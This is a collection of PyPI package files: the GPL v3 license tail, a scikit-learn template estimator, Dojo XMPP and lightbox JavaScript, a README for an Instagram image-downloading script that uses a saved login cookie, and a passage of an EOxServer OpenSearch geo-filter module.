Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
| PypiClean |
/DPA-0.0.3-cp37-cp37m-macosx_10_15_x86_64.whl/Pipeline/_template.py | import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, TransformerMixin
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import euclidean_distances
class TemplateEstimator(BaseEstimator):
    """A template estimator to be used as a reference implementation.
    For more information regarding how to build your own estimator, read more
    in the :ref:`User Guide <user_guide>`.
    Parameters
    ----------
    demo_param : str, default='demo_param'
        A parameter used for demonstration of how to pass and store parameters.
    """
    def __init__(self, demo_param='demo_param'):
        # scikit-learn convention: __init__ only stores hyper-parameters
        # verbatim (no validation, no computation) so that
        # get_params()/set_params() work via signature introspection.
        self.demo_param = demo_param
    def fit(self, X, y):
        """A reference implementation of a fitting function.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            The training input samples.
        y : array-like, shape (n_samples,) or (n_samples, n_outputs)
            The target values (class labels in classification, real numbers in
            regression).
        Returns
        -------
        self : object
            Returns self.
        """
        X, y = check_X_y(X, y, accept_sparse=True)
        # A trailing-underscore attribute marks the estimator as fitted; this
        # is the flag check_is_fitted() looks for in predict().
        self.is_fitted_ = True
        # `fit` should always return `self`
        return self
    def predict(self, X):
        """A reference implementation of a predicting function.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            The training input samples.
        Returns
        -------
        y : ndarray, shape (n_samples,)
            Returns an array of ones.
        """
        X = check_array(X, accept_sparse=True)
        check_is_fitted(self, 'is_fitted_')
        # Template behavior: always predict the constant 1 for every sample.
        return np.ones(X.shape[0], dtype=np.int64)
class TemplateClassifier(BaseEstimator, ClassifierMixin):
    """An example classifier which implements a 1-NN algorithm.
    For more information regarding how to build your own classifier, read more
    in the :ref:`User Guide <user_guide>`.
    Parameters
    ----------
    demo_param : str, default='demo'
        A parameter used for demonstration of how to pass and store parameters.
    Attributes
    ----------
    X_ : ndarray, shape (n_samples, n_features)
        The input passed during :meth:`fit`.
    y_ : ndarray, shape (n_samples,)
        The labels passed during :meth:`fit`.
    classes_ : ndarray, shape (n_classes,)
        The classes seen at :meth:`fit`.
    """
    def __init__(self, demo_param='demo'):
        # Store the hyper-parameter unmodified (scikit-learn convention).
        self.demo_param = demo_param
    def fit(self, X, y):
        """A reference implementation of a fitting function for a classifier.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The training input samples.
        y : array-like, shape (n_samples,)
            The target values. An array of int.
        Returns
        -------
        self : object
            Returns self.
        """
        # Check that X and y have correct shape
        X, y = check_X_y(X, y)
        # Store the classes seen during fit
        self.classes_ = unique_labels(y)
        # 1-NN is a lazy learner: "fitting" is just memorizing the data.
        self.X_ = X
        self.y_ = y
        # Return the classifier
        return self
    def predict(self, X):
        """A reference implementation of a prediction for a classifier.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            The input samples.
        Returns
        -------
        y : ndarray, shape (n_samples,)
            The label for each sample is the label of the closest sample
            seen during fit.
        """
        # Check if fit had been called
        check_is_fitted(self, ['X_', 'y_'])
        # Input validation
        X = check_array(X)
        # For each query row, index of the nearest stored training sample.
        closest = np.argmin(euclidean_distances(X, self.X_), axis=1)
        return self.y_[closest]
class TemplateTransformer(BaseEstimator, TransformerMixin):
    """An example transformer that returns the element-wise square root.
    For more information regarding how to build your own transformer, read more
    in the :ref:`User Guide <user_guide>`.
    Parameters
    ----------
    demo_param : str, default='demo'
        A parameter used for demonstration of how to pass and store parameters.
    Attributes
    ----------
    n_features_ : int
        The number of features of the data passed to :meth:`fit`.
    """
    def __init__(self, demo_param='demo'):
        # Store the hyper-parameter unmodified (scikit-learn convention).
        self.demo_param = demo_param
    def fit(self, X, y=None):
        """A reference implementation of a fitting function for a transformer.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            The training input samples.
        y : None
            There is no need of a target in a transformer, yet the pipeline API
            requires this parameter.
        Returns
        -------
        self : object
            Returns self.
        """
        X = check_array(X, accept_sparse=True)
        # Remember the feature count so transform() can reject mismatched input.
        self.n_features_ = X.shape[1]
        # Return the transformer
        return self
    def transform(self, X):
        """A reference implementation of a transform function.
        Parameters
        ----------
        X : {array-like, sparse-matrix}, shape (n_samples, n_features)
            The input samples.
        Returns
        -------
        X_transformed : array, shape (n_samples, n_features)
            The array containing the element-wise square roots of the values
            in ``X``.
        Raises
        ------
        ValueError
            If ``X`` has a different number of features than the data seen
            during :meth:`fit`.
        """
        # Check if fit had been called
        check_is_fitted(self, 'n_features_')
        # Input validation
        X = check_array(X, accept_sparse=True)
        # Check that the input is of the same shape as the one passed
        # during fit.
        if X.shape[1] != self.n_features_:
            # Fixed: the original implicit string concatenation was missing a
            # space and produced "...seenin `fit`".
            raise ValueError('Shape of input is different from what was seen '
                             'in `fit`')
        return np.sqrt(X)
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojox/xmpp/util.js | if(!dojo._hasResource["dojox.xmpp.util"]){
dojo._hasResource["dojox.xmpp.util"]=true;
dojo.provide("dojox.xmpp.util");
dojo.require("dojox.string.Builder");
dojo.require("dojox.encoding.base64");
dojox.xmpp.util.xmlEncode = function(str){
	// Escape the five XML special characters so `str` can safely be embedded
	// in an XML text node or attribute value. `&` must be escaped first so
	// freshly produced entities are not double-escaped. Global regexes are
	// used so that EVERY occurrence is replaced (the previous version's
	// replacements had been corrupted into no-ops, and a plain string pattern
	// would only replace the first occurrence anyway).
	if(str){
		str = str.replace(/&/g, "&amp;")
			.replace(/>/g, "&gt;")
			.replace(/</g, "&lt;")
			.replace(/'/g, "&#39;")
			.replace(/"/g, "&quot;");
	}
	return str;
};
dojox.xmpp.util.encodeJid = function(jid){
	// Escape characters that are not allowed inside a JID node identifier
	// with their backslash-hex sequences (XEP-0106 style JID escaping).
	// All other characters pass through unchanged.
	var ESCAPES = {
		" ": "\\20", "\"": "\\22", "#": "\\23", "&": "\\26", "'": "\\27",
		"/": "\\2f", ":": "\\3a", "<": "\\3c", ">": "\\3e"
	};
	var result = new dojox.string.Builder();
	for(var idx = 0; idx < jid.length; idx++){
		var ch = jid.charAt(idx);
		result.append(ESCAPES.hasOwnProperty(ch) ? ESCAPES[ch] : ch);
	}
	return result.toString();
};
dojox.xmpp.util.decodeJid = function(jid){
	// Reverse of encodeJid: turn backslash-hex escape sequences back into the
	// characters they stand for. A sequence that matches the regex but is not
	// in the table decodes to the literal string "ARG", exactly like the
	// original switch statement's fall-through.
	var UNESCAPES = {
		"\\20": " ", "\\22": "\"", "\\23": "#", "\\26": "&", "\\27": "'",
		"\\2f": "/", "\\3a": ":", "\\3c": "<", "\\3e": ">"
	};
	return jid.replace(/\\([23][02367acef])/g, function(seq){
		return UNESCAPES.hasOwnProperty(seq) ? UNESCAPES[seq] : "ARG";
	});
};
dojox.xmpp.util.createElement = function(tag, attrs, selfClose){
	// Serialize an XML start tag: '<tag attr="value" ...>' — or a
	// self-closing '<tag attr="value" .../>' when selfClose is truthy.
	// Note: a space always follows the tag name and every attribute, matching
	// the original output byte for byte.
	var buf = new dojox.string.Builder("<");
	buf.append(tag + " ");
	for(var attrName in attrs){
		buf.append(attrName + "=\"" + attrs[attrName] + "\" ");
	}
	buf.append(selfClose ? "/>" : ">");
	return buf.toString();
};
dojox.xmpp.util.stripHtml = function(str){
	// Remove every HTML/XML tag from `str` (non-greedy match between '<' and
	// '>'). The original contained an empty for-loop over `arguments` with no
	// effect; that dead code has been removed.
	return str.replace(/<[^>]*?>/gi, "");
};
dojox.xmpp.util.decodeHtmlEntities = function(str){
	// Decode HTML character entities (e.g. "&amp;" -> "&") by letting the
	// browser parse them: assign to a detached <textarea>'s innerHTML and
	// read back its value. Literal "<" and ">" must be escaped FIRST so they
	// are not interpreted as markup and dropped during parsing — the previous
	// version's pre-escaping had been corrupted into no-op replacements.
	var ta = dojo.doc.createElement("textarea");
	ta.innerHTML = str.replace(/</g, "&lt;").replace(/>/g, "&gt;");
	return ta.value;
};
dojox.xmpp.util.htmlToPlain = function(html){
	// Convert an HTML fragment to plain text in three steps: decode
	// character entities, turn <br> variants into newlines, then strip all
	// remaining tags.
	var text = dojox.xmpp.util.decodeHtmlEntities(html);
	text = text.replace(/<br\s*[i\/]{0,1}>/gi, "\n");
	return dojox.xmpp.util.stripHtml(text);
};
dojox.xmpp.util.Base64 = {};
// Encode a binary string: collect each character's code and hand the byte
// array to the generic dojox base64 encoder.
dojox.xmpp.util.Base64.encode = function(str){
	var bytes = [];
	for(var i = 0; i < str.length; ++i){
		bytes.push(str.charCodeAt(i));
	}
	return dojox.encoding.base64.encode(bytes);
};
// Decode base64 text back into a string by mapping each decoded byte to its
// character and joining the pieces.
dojox.xmpp.util.Base64.decode = function(encoded){
	var chars = [];
	dojo.forEach(dojox.encoding.base64.decode(encoded), function(code){
		chars.push(String.fromCharCode(code));
	});
	return chars.join("");
};
} | PypiClean |
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojox/image/LightboxNano.js | if(!dojo._hasResource["dojox.image.LightboxNano"]){
dojo._hasResource["dojox.image.LightboxNano"]=true;
dojo.provide("dojox.image.LightboxNano");
dojo.require("dojo.fx");
(function(d){
var _1="absolute",_2="visibility",_3=function(){
var _4=(d.doc.compatMode=="BackCompat")?d.body():d.doc.documentElement,_5=dojo._docScroll();
return {w:_4.clientWidth,h:_4.clientHeight,l:_5.x,t:_5.y};
};
d.declare("dojox.image.LightboxNano",null,{href:"",duration:500,preloadDelay:5000,constructor:function(p,n){
var _6=this;
d.mixin(_6,p);
n=_6._node=dojo.byId(n);
if(n){
if(!/a/i.test(n.tagName)){
var a=d.create("a",{href:_6.href,"class":n.className},n,"after");
n.className="";
a.appendChild(n);
n=a;
}
d.style(n,"position","relative");
_6._createDiv("dojoxEnlarge",n);
d.setSelectable(n,false);
_6._onClickEvt=d.connect(n,"onclick",_6,"_load");
}
if(_6.href){
setTimeout(function(){
(new Image()).src=_6.href;
_6._hideLoading();
},_6.preloadDelay);
}
},destroy:function(){
var a=this._connects||[];
a.push(this._onClickEvt);
d.forEach(a,d.disconnect);
d.destroy(this._node);
},_createDiv:function(_7,_8,_9){
return d.create("div",{"class":_7,style:{position:_1,display:_9?"":"none"}},_8);
},_load:function(e){
var _a=this;
e&&d.stopEvent(e);
if(!_a._loading){
_a._loading=true;
_a._reset();
var i=_a._img=d.create("img",{style:{visibility:"hidden",cursor:"pointer",position:_1,top:0,left:0,zIndex:9999999}},d.body()),ln=_a._loadingNode,n=d.query("img",_a._node)[0]||_a._node,a=d.position(n,true),c=d.contentBox(n),b=d._getBorderExtents(n);
if(ln==null){
_a._loadingNode=ln=_a._createDiv("dojoxLoading",_a._node,true);
var l=d.marginBox(ln);
d.style(ln,{left:parseInt((c.w-l.w)/2)+"px",top:parseInt((c.h-l.h)/2)+"px"});
}
c.x=a.x-10+b.l;
c.y=a.y-10+b.t;
_a._start=c;
_a._connects=[d.connect(i,"onload",_a,"_show")];
i.src=_a.href;
}
},_hideLoading:function(){
if(this._loadingNode){
d.style(this._loadingNode,"display","none");
}
this._loadingNode=false;
},_show:function(){
var _b=this,vp=_3(),w=_b._img.width,h=_b._img.height,_c=parseInt((vp.w-20)*0.9),_d=parseInt((vp.h-20)*0.9),dd=d.doc,bg=_b._bg=d.create("div",{style:{backgroundColor:"#000",opacity:0,position:_1,zIndex:9999998}},d.body()),ln=_b._loadingNode;
if(_b._loadingNode){
_b._hideLoading();
}
d.style(_b._img,{border:"10px solid #fff",visibility:"visible"});
d.style(_b._node,_2,"hidden");
_b._loading=false;
_b._connects=_b._connects.concat([d.connect(dd,"onmousedown",_b,"_hide"),d.connect(dd,"onkeypress",_b,"_key"),d.connect(window,"onresize",_b,"_sizeBg")]);
if(w>_c){
h=h*_c/w;
w=_c;
}
if(h>_d){
w=w*_d/h;
h=_d;
}
_b._end={x:(vp.w-20-w)/2+vp.l,y:(vp.h-20-h)/2+vp.t,w:w,h:h};
_b._sizeBg();
d.fx.combine([_b._anim(_b._img,_b._coords(_b._start,_b._end)),_b._anim(bg,{opacity:0.5})]).play();
},_sizeBg:function(){
var dd=d.doc.documentElement;
d.style(this._bg,{top:0,left:0,width:dd.scrollWidth+"px",height:dd.scrollHeight+"px"});
},_key:function(e){
d.stopEvent(e);
this._hide();
},_coords:function(s,e){
return {left:{start:s.x,end:e.x},top:{start:s.y,end:e.y},width:{start:s.w,end:e.w},height:{start:s.h,end:e.h}};
},_hide:function(){
var _e=this;
d.forEach(_e._connects,d.disconnect);
_e._connects=[];
d.fx.combine([_e._anim(_e._img,_e._coords(_e._end,_e._start),"_reset"),_e._anim(_e._bg,{opacity:0})]).play();
},_reset:function(){
d.style(this._node,_2,"visible");
d.forEach([this._img,this._bg],function(n){
d.destroy(n);
n=null;
});
this._node.focus();
},_anim:function(_f,_10,_11){
return d.animateProperty({node:_f,duration:this.duration,properties:_10,onEnd:_11?d.hitch(this,_11):null});
},show:function(_12){
_12=_12||{};
this.href=_12.href||this.href;
var n=d.byId(_12.origin),vp=_3();
this._node=n||d.create("div",{style:{position:_1,width:0,hieght:0,left:(vp.l+(vp.w/2))+"px",top:(vp.t+(vp.h/2))+"px"}},d.body());
this._load();
if(!n){
d.destroy(this._node);
}
}});
})(dojo);
} | PypiClean |
/InstaDown_new-2.0b0.tar.gz/InstaDown_new-2.0b0/README.md | ```
_________ _ _______ _________ _______ ______ _______ _
\__ __/( ( /|( ____ \\__ __/( ___ )( __ \ ( ___ )|\ /|( ( /|
) ( | \ ( || ( \/ ) ( | ( ) || ( \ )| ( ) || ) ( || \ ( |
| | | \ | || (_____ | | | (___) || | ) || | | || | _ | || \ | |
| | | (\ \) |(_____ ) | | | ___ || | | || | | || |( )| || (\ \) |
| | | | \ | ) | | | | ( ) || | ) || | | || || || || | \ |
___) (___| ) \ |/\____) | | | | ) ( || (__/ )| (___) || () () || ) \ |
\_______/|/ )_)\_______) )_( |/ \|(______/ (_______)(_______)|/ )_)
```
DISCLAIMER: for those of you somehow thinking Steve Jobs was more than an enslaver getting phones out of Foxconn employees' tears, there seems to be an incompatibility between some of your Apple CPUs and the latest GeckoDriver instance. If the related error pops up as you run the cookie creator, you can manually download the correct driver from [the official repository](https://github.com/mozilla/geckodriver/releases). I am guessing that is the aarch64 version. Then put its location (absolute path) in the cookie_creator.py and the InstaDown.py files swapping this string:
```driver = webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=fireFoxOptions)```
with this string, with your path to the downloaded geckodriver obviously:
```driver = webdriver.Firefox(executable_path="INSERT YOUR PATH", options=fireFoxOptions)```
# InstaDown
A simple python script that uses GeckoDriver to intiate an headless Firefox browser agent to download pictures from Instagram posts' URLs.
The script uses a .txt file with one post link per line to extract the images (the file contains examples already).
It renames the downloaded JPG images with the unique code identifying each post (the one after www.instagram.com/p/...).
Moreover, to ease the login phase, another .py file can be run to login and create a cookies file, that is needed by InstaDown to operate properly
## Installing
Clone this repository from Github or download it.
First you need to install the packages in requirements.txt:
```pip install -r requirements.txt```
## Setting up a list of links for download
Then, you need to open the links_list.txt and add your list of links, one per line, save it.
***IMPORTANT: Add its absolute path in the InstaDown.py file.***
To make it as easy as possible, you just need to open the .py file and search
```INSERT ABSOLUTE PATH TO```
and substitute it with your path to the file.
***You will need to do the same for the cookies file***
## Setting Up Cookies
This step is necessary to prevent InstaDown from requesting a login every time you open a new session. You only need to create the file once.
Open a command prompt or powershell window and set its working directory in the InstaDown folder.
Then run:
```python Cookie_creator.py```
It will open a browser in the background (invisible to the user), go to Instagram.com and ask you to input username and password in the command prompt, powershell or terminal window. *THIS IS SAFER THAN LOGGING IN TRADITIONALLY, ESPECIALLY FOR POTENTIALLY COMPROMISED MACHINES, BECAUSE THE INPUT IS HIDDEN FROM THE USER AS WELL.*
If it logs in correctly, a cookie.pkl file will be created in your InstaDown folder.
***IMPORTANT: Add its absolute path in the InstaDown.py file.***
## Running InstaDown, step by step
Just run this in a powershell window with the InstaDown folder as working directory:
```python InstaDown.py```
It will tell you the unique code corresponding to the image it is downloading as it progresses.
You can find all the information necessary to understand the script and tweak it within the code, as it is heavily commented.
You need to give it a list of links to instagram posts, written one per line in a .txt file. Rename the .txt file links_list.txt (or change the code) and set the absolute path to your file in the script.
The images are saved in the same folder as that of InstaDown.py.
### Troubleshooting
When it crashes (because it will crash), you can see the last downloaded post in the terminal window, double check that the image has been downloaded in the output folder (named with the hashtag or username handle you scraped), fix the links_list.txt accordingly and proceed.
**IMPORTANT:** if the script finishes all the links, it will let you know by printing "No links to download detected!" and shut down.
If it crashed because the post has been deleted and it finds no image to download, erase that link as well, otherwise it will keep crashing.
If it does not work at all, check if Meta changed the class id identifying the HTML element containing the picture link. Currently (7/22), it is "_aagv".
This is the very first functional script I have ever made and I am just starting with Python and scraping. I hope someone will find it useful!
| PypiClean |
/EOxServer-1.2.12-py3-none-any.whl/eoxserver/services/opensearch/extensions/geo.py |
from django.contrib.gis.geos import GEOSGeometry, Point, Polygon, MultiPolygon
from django.contrib.gis.measure import D
from eoxserver.core.decoders import kvp, enum
from eoxserver.core.util.xmltools import NameSpace
class GeoExtension(object):
    """ Implementation of the OpenSearch `'Geo' extension draft
    <http://www.opensearch.org/Specifications/OpenSearch/Extensions/Geo/1.0/Draft_2>`_.
    Currently all parameters apart from the ``name`` are supported. The point
    plus radius with the relation type ``contains`` requires a PostGIS database
    backend.
    """
    namespace = NameSpace(
        "http://a9.com/-/opensearch/extensions/geo/1.0/", "geo"
    )
    def filter(self, qs, parameters):
        """Apply the decoded Geo-extension parameters as spatial filters on the
        ``footprint`` of the given queryset ``qs`` and return the filtered
        queryset. Exactly one of the spatial modes applies per request:
        explicit geometry, point + radius, or bare point; the ``uid`` filter is
        applied independently on top.
        """
        decoder = GeoExtensionDecoder(parameters)
        # 'box' takes precedence over 'geometry' when both are supplied.
        geom = decoder.box or decoder.geometry
        lon, lat = decoder.lon, decoder.lat
        distance = decoder.radius
        relation = decoder.relation
        uid = decoder.uid
        if geom:
            # Explicit search geometry (bounding box or WKT geometry).
            if relation == "intersects":
                qs = qs.filter(footprint__intersects=geom)
            elif relation == "contains":
                # 'contains' means the footprint lies within the search area.
                qs = qs.filter(footprint__coveredby=geom)
            elif relation == "disjoint":
                qs = qs.filter(footprint__disjoint=geom)
        elif lon is not None and lat is not None and distance is not None:
            # Point-plus-radius search.
            geom = Point(lon, lat)
            if relation == "intersects":
                qs = qs.filter(footprint__distance_lte=(geom, distance))
            elif relation == "contains":
                # TODO: right?, also only available on postgis
